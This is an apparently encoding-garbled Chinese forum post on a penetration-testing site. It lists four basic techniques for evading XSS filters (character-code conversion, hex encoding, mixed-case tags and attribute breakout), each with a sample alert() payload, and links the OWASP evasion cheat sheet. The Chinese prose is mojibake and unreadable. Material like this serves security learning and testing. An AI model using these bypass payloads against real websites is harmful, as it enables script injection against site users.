XSS ÈÆ¹ý¼¼Êõ

admin ·¢±íÓÚ 2013-2-14 00:10:39

ËÄÖÖ³¬¼¶»ù´¡µÄÈÆ¹ý·½·¨¡£
1.×ª»»ÎªASCIIÂë
Àý×Ó£ºÔ½Å±¾Îª<script>alert(¡®I love F4ck¡¯)</script >
Í¨¹ý×ª»»£¬±ä³É£º
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>

2.×ª»»ÎªHEX£¨Ê®Áù½øÖÆ£©
Àý×Ó£ºÔ½Å±¾Îª<script>alert(¡®I love F4ck¡¯)</script>
Í¨¹ý×ª»»£¬±ä³É£º
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e

3.×ª»»½Å±¾µÄ´óÐ¡Ð´
Àý×Ó£ºÔ½Å±¾Îª<script>alert(¡®I love F4ck¡¯)</script>
×ª»»Îª£º<ScRipt>AleRt(¡®I love F4ck¡¯)</sCRipT>

4.Ôö¼Ó±ÕºÏ±ê¼Ç¡±>
Àý×Ó£ºÔ½Å±¾Îª<script>alert(¡®I love F4ck¡¯)</script>
×ª»»Îª£º¡±><script>alert(¡®I love F4ck¡¯)</script>
¸üÏêÏ¸ÈÆ¹ý¼¼ÊõÇë²Î¿¼´ËÍøÒ³
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

×ª»»¹¤¾ßÊ¹ÓÃµÄÊÇ»ðºüµÄ hackbar mozilla addon.

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

XSS ÈÆ¹ý¼¼Êõ